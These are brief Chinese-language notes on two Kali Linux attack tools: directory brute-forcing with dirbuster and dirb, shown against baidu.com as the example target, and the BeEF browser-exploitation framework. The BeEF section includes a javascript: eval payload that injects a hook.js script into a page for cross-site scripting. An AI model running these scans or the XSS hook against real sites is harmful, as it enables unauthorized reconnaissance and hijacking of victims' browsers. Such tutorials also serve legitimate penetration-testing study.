一. 网站子目录爆破工具
1.dirbuster,kali系统自带界面,使用起来非常简单
字典目录/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
2.dirb https://www.baidu.com
二、beef工具
1.kali系统自带beef工具,启动之后就可以生成web端的使用界面,还有一个hook.js脚本页面,将脚本页面添加到自己需要进行xss攻击的src,即可使用
javascript:eval(‘window.s=document.createElement(“script”);window.s.src=“http://localhost/xss/hook.js”;document.body.appendChild(window.s)’)